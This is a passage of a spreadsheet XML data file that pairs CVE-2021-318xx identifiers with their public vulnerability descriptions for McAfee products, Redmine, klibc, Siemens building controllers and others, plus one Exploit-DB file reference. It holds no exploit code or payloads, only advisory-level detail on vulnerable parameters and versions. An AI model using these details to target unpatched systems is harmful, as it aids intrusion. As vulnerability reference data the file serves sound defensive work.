    <t>CVE-2021-31837</t>
  </si>
  <si>
    <t>Memory corruption vulnerability in the driver file component in McAfee GetSusp prior to 4.0.0 could allow a program being investigated on the local machine to trigger a buffer overflow in GetSusp, leading to the execution of arbitrary code, potentially triggering a BSOD.</t>
  </si>
  <si>
    <t>CVE-2021-31838</t>
  </si>
  <si>
    <t>A command injection vulnerability in MVISION EDR (MVEDR) prior to 3.4.0 allows an authenticated MVEDR administrator to trigger the EDR client to execute arbitrary commands through PowerShell using the EDR functionality 'execute reaction'.</t>
  </si>
  <si>
    <t>CVE-2021-31839</t>
  </si>
  <si>
    <t>Improper privilege management vulnerability in McAfee Agent for Windows prior to 5.7.3 allows a local user to modify event information in the MA event folder. This allows a local user to either add false events or remove events from the event logs prior to them being sent to the ePO server.</t>
  </si>
  <si>
    <t>CVE-2021-3184</t>
  </si>
  <si>
    <t>MISP 2.4.136 has XSS via a crafted URL to the app/View/Elements/global_menu.ctp user homepage favourite button.</t>
  </si>
  <si>
    <t>CVE-2021-31840</t>
  </si>
  <si>
    <t>A vulnerability in the preloading mechanism of specific dynamic link libraries in McAfee Agent for Windows prior to 5.7.3 could allow an authenticated, local attacker to perform a DLL preloading attack with unsigned DLLs. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system. This would result in the user gaining elevated permissions and being able to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-31841</t>
  </si>
  <si>
    <t>A DLL sideloading vulnerability in McAfee Agent for Windows prior to 5.7.4 could allow a local user to perform a DLL sideloading attack with an unsigned DLL with a specific name and in a specific location. This would result in the user gaining elevated permissions and the ability to execute arbitrary code as the system user, through not checking the DLL signature.</t>
  </si>
  <si>
    <t>CVE-2021-31842</t>
  </si>
  <si>
    <t>XML Entity Expansion injection vulnerability in McAfee Endpoint Security (ENS) for Windows prior to 10.7.0 September 2021 Update allows a local user to initiate high CPU and memory consumption resulting in a Denial of Service attack through carefully editing the EPDeploy.xml file and then executing the setup process.</t>
  </si>
  <si>
    <t>CVE-2021-31843</t>
  </si>
  <si>
    <t>Improper privileges management vulnerability in McAfee Endpoint Security (ENS) Windows prior to 10.7.0 September 2021 Update allows local users to access files which they would otherwise not have access to via manipulating junction links to redirect McAfee folder operations to an unintended location.</t>
  </si>
  <si>
    <t>CVE-2021-31844</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in McAfee Data Loss Prevention (DLP) Endpoint for Windows prior to 11.6.200 allows a local attacker to execute arbitrary code with elevated privileges through placing carefully constructed Ami Pro (.sam) files onto the local system and triggering a DLP Endpoint scan through accessing a file. This is caused by the destination buffer being of fixed size and incorrect checks being made on the source size.</t>
  </si>
  <si>
    <t>CVE-2021-31845</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in McAfee Data Loss Prevention (DLP) Discover prior to 11.6.100 allows an attacker in the same network as the DLP Discover to execute arbitrary code through placing carefully constructed Ami Pro (.sam) files onto a machine and having DLP Discover scan it, leading to remote code execution with elevated privileges. This is caused by the destination buffer being of fixed size and incorrect checks being made on the source size.</t>
  </si>
  <si>
    <t>CVE-2021-31847</t>
  </si>
  <si>
    <t>Improper access control vulnerability in the repair process for McAfee Agent for Windows prior to 5.7.4 could allow a local attacker to perform a DLL preloading attack using unsigned DLLs. This would result in elevation of privileges and the ability to execute arbitrary code as the system user, through not correctly protecting a temporary directory used in the repair process and not checking the DLL signature.</t>
  </si>
  <si>
    <t>CVE-2021-31848</t>
  </si>
  <si>
    <t>Cross site scripting (XSS) vulnerability in McAfee Data Loss Prevention (DLP) ePO extension prior to 11.7.100 allows a remote attacker to highjack an active DLP ePO administrator session by convincing the logged in administrator to click on a carefully crafted link in the case management part of the DLP ePO extension.</t>
  </si>
  <si>
    <t>CVE-2021-31849</t>
  </si>
  <si>
    <t>SQL injection vulnerability in McAfee Data Loss Prevention (DLP) ePO extension prior to 11.7.100 allows a remote attacker logged into ePO as an administrator to inject arbitrary SQL into the ePO database through the user management section of the DLP ePO extension.</t>
  </si>
  <si>
    <t>CVE-2021-3185</t>
  </si>
  <si>
    <t>A flaw was found in the gstreamer h264 component of gst-plugins-bad before v1.18.1 where when parsing a h264 header, an attacker could cause the stack to be smashed, memory corruption and possibly code execution.</t>
  </si>
  <si>
    <t>CVE-2021-31850</t>
  </si>
  <si>
    <t>A denial-of-service vulnerability in Database Security (DBS) prior to 4.8.4 allows a remote authenticated administrator to trigger a denial-of-service attack against the DBS server. The configuration of Archiving through the User interface incorrectly allowed the creation of directories and files in Windows system directories and other locations where sensitive data could be overwritten. The former could lead to a DoS, whilst the latter could lead to data destruction on the DBS server.</t>
  </si>
  <si>
    <t>CVE-2021-31851</t>
  </si>
  <si>
    <t>A Reflected Cross-Site Scripting vulnerability in McAfee Policy Auditor prior to 6.5.2 allows a remote unauthenticated attacker to inject arbitrary web script or HTML via the profileNodeID request parameters. The malicious script is reflected unmodified into the Policy Auditor web-based interface which could lead to the extraction of end user session token or login credentials. These may be used to access additional security-critical applications or conduct arbitrary cross-domain requests.</t>
  </si>
  <si>
    <t>CVE-2021-31852</t>
  </si>
  <si>
    <t>A Reflected Cross-Site Scripting vulnerability in McAfee Policy Auditor prior to 6.5.2 allows a remote unauthenticated attacker to inject arbitrary web script or HTML via the UID request parameter. The malicious script is reflected unmodified into the Policy Auditor web-based interface which could lead to the extract of end user session token or login credentials. These may be used to access additional security-critical applications or conduct arbitrary cross-domain requests.</t>
  </si>
  <si>
    <t>CVE-2021-31853</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking Vulnerability in McAfee Drive Encryption (MDE) prior to 7.3.0 HF2 (7.3.0.183) allows local users to execute arbitrary code and escalate privileges via execution from a compromised folder.</t>
  </si>
  <si>
    <t>CVE-2021-31854</t>
  </si>
  <si>
    <t>A command Injection Vulnerability in McAfee Agent (MA) for Windows prior to 5.7.5 allows local users to inject arbitrary shell code into the file cleanup.exe. The malicious clean.exe file is placed into the relevant folder and executed by running the McAfee Agent deployment feature located in the System Tree. An attacker may exploit the vulnerability to obtain a reverse shell which can lead to privilege escalation to obtain root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-31855</t>
  </si>
  <si>
    <t>KDE Messagelib through 5.17.0 reveals cleartext of encrypted messages in some situations. Deleting an attachment of a decrypted encrypted message stored on a remote server (e.g., an IMAP server) causes KMail to upload the decrypted content of the message to the remote server. With a crafted message, a user could be tricked into decrypting an encrypted message and then deleting an attachment attached to this message. If the attacker has access to the messages stored on the email server, then the attacker could read the decrypted content of the encrypted message. This occurs in ViewerPrivate::deleteAttachment in messageviewer/src/viewer/viewer_p.cpp.</t>
  </si>
  <si>
    <t>CVE-2021-31856</t>
  </si>
  <si>
    <t>A SQL Injection vulnerability in the REST API in Layer5 Meshery 0.5.2 allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).</t>
  </si>
  <si>
    <t>CVE-2021-31857</t>
  </si>
  <si>
    <t>In Zoho ManageEngine Password Manager Pro before 11.1 build 11104, attackers are able to retrieve credentials via a browser extension for non-website resource types.</t>
  </si>
  <si>
    <t>CVE-2021-31858</t>
  </si>
  <si>
    <t>DotNetNuke (DNN) 9.9.1 CMS is vulnerable to a Stored Cross-Site Scripting vulnerability in the user profile biography section which allows remote authenticated users to inject arbitrary code via a crafted payload.</t>
  </si>
  <si>
    <t>CVE-2021-31859</t>
  </si>
  <si>
    <t>Incorrect privileges in the MU55 FlexiSpooler service in YSoft SafeQ 6 6.0.55 allows local user privilege escalation by overwriting the executable file via an alternative data stream.</t>
  </si>
  <si>
    <t>CVE-2021-3186</t>
  </si>
  <si>
    <t>A Stored Cross-site scripting (XSS) vulnerability in /main.html Wifi Settings in Tenda AC5 AC1200 version V15.03.06.47_multi allows remote attackers to inject arbitrary web script or HTML via the Wifi Name parameter.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/49478.txt</t>
  </si>
  <si>
    <t>Tenda AC5 AC1200 Wireless - 'WiFi Name &amp; Password' Stored Cross Site Scripting</t>
  </si>
  <si>
    <t>CVE-2021-31862</t>
  </si>
  <si>
    <t>SysAid 20.4.74 allows XSS via the KeepAlive.jsp stamp parameter without any authentication.</t>
  </si>
  <si>
    <t>CVE-2021-31863</t>
  </si>
  <si>
    <t>Insufficient input validation in the Git repository integration of Redmine before 4.0.9, 4.1.x before 4.1.3, and 4.2.x before 4.2.1 allows Redmine users to read arbitrary local files accessible by the application server process.</t>
  </si>
  <si>
    <t>CVE-2021-31864</t>
  </si>
  <si>
    <t>Redmine before 4.0.9, 4.1.x before 4.1.3, and 4.2.x before 4.2.1 allows attackers to bypass the add_issue_notes permission requirement by leveraging the incoming mail handler.</t>
  </si>
  <si>
    <t>CVE-2021-31865</t>
  </si>
  <si>
    <t>Redmine before 4.0.9, 4.1.x before 4.1.3, and 4.2.x before 4.2.1 allows users to circumvent the allowed filename extensions of uploaded attachments.</t>
  </si>
  <si>
    <t>CVE-2021-31866</t>
  </si>
  <si>
    <t>Redmine before 4.0.9 and 4.1.x before 4.1.3 allows an attacker to learn the values of internal authentication keys by observing timing differences in string comparison operations within SysController and MailHandlerController.</t>
  </si>
  <si>
    <t>CVE-2021-31867</t>
  </si>
  <si>
    <t>Pimcore Customer Data Framework version 3.0.0 and earlier suffers from a Boolean-based blind SQL injection issue in the $id parameter of the SegmentAssignmentController.php component of the application. This issue was fixed in version 3.0.2 of the product.</t>
  </si>
  <si>
    <t>CVE-2021-31868</t>
  </si>
  <si>
    <t>Rapid7 Nexpose version 6.6.95 and earlier allows authenticated users of the Security Console to view and edit any ticket in the legacy ticketing feature, regardless of the assignment of the ticket. This issue was resolved in version 6.6.96, released on August 4, 2021.</t>
  </si>
  <si>
    <t>CVE-2021-31869</t>
  </si>
  <si>
    <t>Pimcore AdminBundle version 6.8.0 and earlier suffers from a SQL injection issue in the specificID variable used by the application. This issue was fixed in version 6.9.4 of the product.</t>
  </si>
  <si>
    <t>CVE-2021-31870</t>
  </si>
  <si>
    <t>An issue was discovered in klibc before 2.0.9. Multiplication in the calloc() function may result in an integer overflow and a subsequent heap buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-31871</t>
  </si>
  <si>
    <t>An issue was discovered in klibc before 2.0.9. An integer overflow in the cpio command may result in a NULL pointer dereference on 64-bit systems.</t>
  </si>
  <si>
    <t>CVE-2021-31872</t>
  </si>
  <si>
    <t>An issue was discovered in klibc before 2.0.9. Multiple possible integer overflows in the cpio command on 32-bit systems may result in a buffer overflow or other security impact.</t>
  </si>
  <si>
    <t>CVE-2021-31873</t>
  </si>
  <si>
    <t>An issue was discovered in klibc before 2.0.9. Additions in the malloc() function may result in an integer overflow and a subsequent heap buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-31874</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADSelfService Plus before 6104, in rare situations, allows attackers to obtain sensitive information about the password-sync database application.</t>
  </si>
  <si>
    <t>CVE-2021-31875</t>
  </si>
  <si>
    <t>In mjs_json.c in Cesanta MongooseOS mJS 1.26, a maliciously formed JSON string can trigger an off-by-one heap-based buffer overflow in mjs_json_parse, which can potentially lead to redirection of control flow.</t>
  </si>
  <si>
    <t>CVE-2021-31876</t>
  </si>
  <si>
    <t>Bitcoin Core 0.12.0 through 0.21.1 does not properly implement the replacement policy specified in BIP125, which makes it easier for attackers to trigger a loss of funds, or a denial of service attack against downstream projects such as Lightning network nodes. An unconfirmed child transaction with nSequence = 0xff_ff_ff_ff, spending an unconfirmed parent with nSequence &lt;= 0xff_ff_ff_fd, should be replaceable because there is inherited signaling by the child transaction. However, the actual PreChecks implementation does not enforce this. Instead, mempool rejects the replacement attempt of the unconfirmed child transaction.</t>
  </si>
  <si>
    <t>CVE-2021-31878</t>
  </si>
  <si>
    <t>An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request.</t>
  </si>
  <si>
    <t>CVE-2021-31879</t>
  </si>
  <si>
    <t>GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007.</t>
  </si>
  <si>
    <t>CVE-2021-3188</t>
  </si>
  <si>
    <t>phpList 3.6.0 allows CSV injection, related to the email parameter, and /lists/admin/ exports.</t>
  </si>
  <si>
    <t>CVE-2021-31881</t>
  </si>
  <si>
    <t>A vulnerability has been identified in APOGEE MBC (PPC) (BACnet) (All versions), APOGEE MBC (PPC) (P2 Ethernet) (All versions), APOGEE MEC (PPC) (BACnet) (All versions), APOGEE MEC (PPC) (P2 Ethernet) (All versions), APOGEE PXC Compact (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Compact (P2 Ethernet) (All versions &lt; V2.8.19), APOGEE PXC Modular (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Modular (P2 Ethernet) (All versions &lt; V2.8.19), Capital VSTAR (All versions with enabled Ethernet options), Desigo PXC00-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC00-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC001-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC100-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC12-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC128-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC200-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC36.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC50-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC64-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXM20-E (All versions &gt;= V2.3 and &lt; V6.30.016), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions &lt; V2017.02.4), Nucleus Source Code (All versions), TALON TC Compact (BACnet) (All versions &lt; V3.5.4), TALON TC Modular (BACnet) (All versions &lt; V3.5.4). When processing a DHCP OFFER message, the DHCP client application does not validate the length of the Vendor option(s), leading to Denial-of-Service conditions. (FSMD-2021-0008)</t>
  </si>
  <si>
    <t>CVE-2021-31882</t>
  </si>
  <si>
    <t>A vulnerability has been identified in APOGEE MBC (PPC) (BACnet) (All versions), APOGEE MBC (PPC) (P2 Ethernet) (All versions), APOGEE MEC (PPC) (BACnet) (All versions), APOGEE MEC (PPC) (P2 Ethernet) (All versions), APOGEE PXC Compact (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Compact (P2 Ethernet) (All versions &lt; V2.8.19), APOGEE PXC Modular (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Modular (P2 Ethernet) (All versions &lt; V2.8.19), Capital VSTAR (All versions with enabled Ethernet options), Desigo PXC00-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC00-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC001-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC100-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC12-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC128-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC200-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC36.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC50-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC64-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXM20-E (All versions &gt;= V2.3 and &lt; V6.30.016), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions &lt; V2017.02.4), Nucleus Source Code (All versions), TALON TC Compact (BACnet) (All versions &lt; V3.5.4), TALON TC Modular (BACnet) (All versions &lt; V3.5.4). The DHCP client application does not validate the length of the Domain Name Server IP option(s) (0x06) when processing DHCP ACK packets. This may lead to Denial-of-Service conditions. (FSMD-2021-0011)</t>
  </si>
  <si>
    <t>CVE-2021-31883</t>
  </si>
  <si>
    <t>A vulnerability has been identified in APOGEE MBC (PPC) (BACnet) (All versions), APOGEE MBC (PPC) (P2 Ethernet) (All versions), APOGEE MEC (PPC) (BACnet) (All versions), APOGEE MEC (PPC) (P2 Ethernet) (All versions), APOGEE PXC Compact (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Compact (P2 Ethernet) (All versions &lt; V2.8.19), APOGEE PXC Modular (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Modular (P2 Ethernet) (All versions &lt; V2.8.19), Capital VSTAR (All versions with enabled Ethernet options), Desigo PXC00-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC00-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC001-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC100-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC12-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC128-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC200-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC36.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC50-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC64-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXM20-E (All versions &gt;= V2.3 and &lt; V6.30.016), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions &lt; V2017.02.4), Nucleus Source Code (All versions), TALON TC Compact (BACnet) (All versions &lt; V3.5.4), TALON TC Modular (BACnet) (All versions &lt; V3.5.4). When processing a DHCP ACK message, the DHCP client application does not validate the length of the Vendor option(s), leading to Denial-of-Service conditions. (FSMD-2021-0013)</t>
  </si>
  <si>
    <t>CVE-2021-31884</t>
  </si>
  <si>
    <t>A vulnerability has been identified in APOGEE MBC (PPC) (BACnet) (All versions), APOGEE MBC (PPC) (P2 Ethernet) (All versions), APOGEE MEC (PPC) (BACnet) (All versions), APOGEE MEC (PPC) (P2 Ethernet) (All versions), APOGEE PXC Compact (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Compact (P2 Ethernet) (All versions &lt; V2.8.19), APOGEE PXC Modular (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Modular (P2 Ethernet) (All versions &lt; V2.8.19), Capital VSTAR (All versions with enabled Ethernet options), Desigo PXC00-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC00-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC001-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC100-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC12-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC128-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC200-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC36.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC50-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC64-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXM20-E (All versions &gt;= V2.3 and &lt; V6.30.016), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions &lt; V2017.02.4), Nucleus Source Code (All versions), TALON TC Compact (BACnet) (All versions &lt; V3.5.4), TALON TC Modular (BACnet) (All versions &lt; V3.5.4). The DHCP client application assumes that the data supplied with the “Hostname” DHCP option is NULL terminated. In cases when global hostname variable is not defined, this may lead to Out-of-bound reads, writes, and Denial-of-service conditions. (FSMD-2021-0014)</t>
  </si>
  <si>
    <t>170</t>
  </si>
  <si>
    <t>CVE-2021-31885</t>
  </si>
  <si>
    <t>A vulnerability has been identified in APOGEE MBC (PPC) (BACnet) (All versions), APOGEE MBC (PPC) (P2 Ethernet) (All versions), APOGEE MEC (PPC) (BACnet) (All versions), APOGEE MEC (PPC) (P2 Ethernet) (All versions), APOGEE PXC Compact (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Compact (P2 Ethernet) (All versions &lt; V2.8.19), APOGEE PXC Modular (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Modular (P2 Ethernet) (All versions &lt; V2.8.19), Desigo PXC00-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC00-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC001-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC100-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC12-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC128-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC200-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC36.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC50-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC64-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXM20-E (All versions &gt;= V2.3 and &lt; V6.30.016), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions &lt; V2017.02.4), Nucleus ReadyStart V4 (All versions &lt; V4.1.1), Nucleus Source Code (All versions), PLUSCONTROL 1st Gen (All versions), TALON TC Compact (BACnet) (All versions &lt; V3.5.4), TALON TC Modular (BACnet) (All versions &lt; V3.5.4). TFTP server application allows for reading the contents of the TFTP memory buffer via sending malformed TFTP commands. (FSMD-2021-0009)</t>
  </si>
  <si>
    <t>CVE-2021-31886</t>
  </si>
  <si>
    <t>A vulnerability has been identified in APOGEE MBC (PPC) (BACnet) (All versions), APOGEE MBC (PPC) (P2 Ethernet) (All versions), APOGEE MEC (PPC) (BACnet) (All versions), APOGEE MEC (PPC) (P2 Ethernet) (All versions), APOGEE PXC Compact (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Compact (P2 Ethernet) (All versions &lt; V2.8.19), APOGEE PXC Modular (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Modular (P2 Ethernet) (All versions &lt; V2.8.19), Desigo PXC00-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC00-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC001-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC100-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC12-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC128-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC200-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC36.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC50-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC64-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXM20-E (All versions &gt;= V2.3 and &lt; V6.30.016), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions &lt; V2017.02.4), Nucleus Source Code (All versions), TALON TC Compact (BACnet) (All versions &lt; V3.5.4), TALON TC Modular (BACnet) (All versions &lt; V3.5.4). FTP server does not properly validate the length of the “USER” command, leading to stack-based buffer overflows. This may result in Denial-of-Service conditions and Remote Code Execution. (FSMD-2021-0010)</t>
  </si>
  <si>
    <t>CVE-2021-31887</t>
  </si>
  <si>
    <t>A vulnerability has been identified in APOGEE MBC (PPC) (BACnet) (All versions), APOGEE MBC (PPC) (P2 Ethernet) (All versions), APOGEE MEC (PPC) (BACnet) (All versions), APOGEE MEC (PPC) (P2 Ethernet) (All versions), APOGEE PXC Compact (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Compact (P2 Ethernet) (All versions &lt; V2.8.19), APOGEE PXC Modular (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Modular (P2 Ethernet) (All versions &lt; V2.8.19), Desigo PXC00-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC00-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC001-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC100-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC12-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC128-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC200-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC36.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC50-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC64-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXM20-E (All versions &gt;= V2.3 and &lt; V6.30.016), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions &lt; V2017.02.4), Nucleus Source Code (All versions), TALON TC Compact (BACnet) (All versions &lt; V3.5.4), TALON TC Modular (BACnet) (All versions &lt; V3.5.4). FTP server does not properly validate the length of the “PWD/XPWD” command, leading to stack-based buffer overflows. This may result in Denial-of-Service conditions and Remote Code Execution. (FSMD-2021-0016)</t>
  </si>
  <si>
    <t>CVE-2021-31888</t>
  </si>
  <si>
    <t>A vulnerability has been identified in APOGEE MBC (PPC) (BACnet) (All versions), APOGEE MBC (PPC) (P2 Ethernet) (All versions), APOGEE MEC (PPC) (BACnet) (All versions), APOGEE MEC (PPC) (P2 Ethernet) (All versions), APOGEE PXC Compact (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Compact (P2 Ethernet) (All versions &lt; V2.8.19), APOGEE PXC Modular (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Modular (P2 Ethernet) (All versions &lt; V2.8.19), Desigo PXC00-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC00-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC001-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC100-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC12-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC128-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC200-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC36.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC50-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC64-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXM20-E (All versions &gt;= V2.3 and &lt; V6.30.016), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions &lt; V2017.02.4), Nucleus Source Code (All versions), TALON TC Compact (BACnet) (All versions &lt; V3.5.4), TALON TC Modular (BACnet) (All versions &lt; V3.5.4). FTP server does not properly validate the length of the “MKD/XMKD” command, leading to stack-based buffer overflows. This may result in Denial-of-Service conditions and Remote Code Execution. (FSMD-2021-0018)</t>
  </si>
  <si>
    <t>CVE-2021-31889</t>
  </si>
  <si>
    <t>A vulnerability has been identified in APOGEE MBC (PPC) (BACnet) (All versions), APOGEE MBC (PPC) (P2 Ethernet) (All versions), APOGEE MEC (PPC) (BACnet) (All versions), APOGEE MEC (PPC) (P2 Ethernet) (All versions), APOGEE PXC Compact (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Compact (P2 Ethernet) (All versions &lt; V2.8.19), APOGEE PXC Modular (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Modular (P2 Ethernet) (All versions &lt; V2.8.19), Capital VSTAR (All versions with enabled Ethernet options), Desigo PXC00-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC00-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC001-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC100-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC12-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC128-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC200-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC36.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC50-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC64-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXM20-E (All versions &gt;= V2.3 and &lt; V6.30.016), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions &lt; V2017.02.4), Nucleus Source Code (All versions), 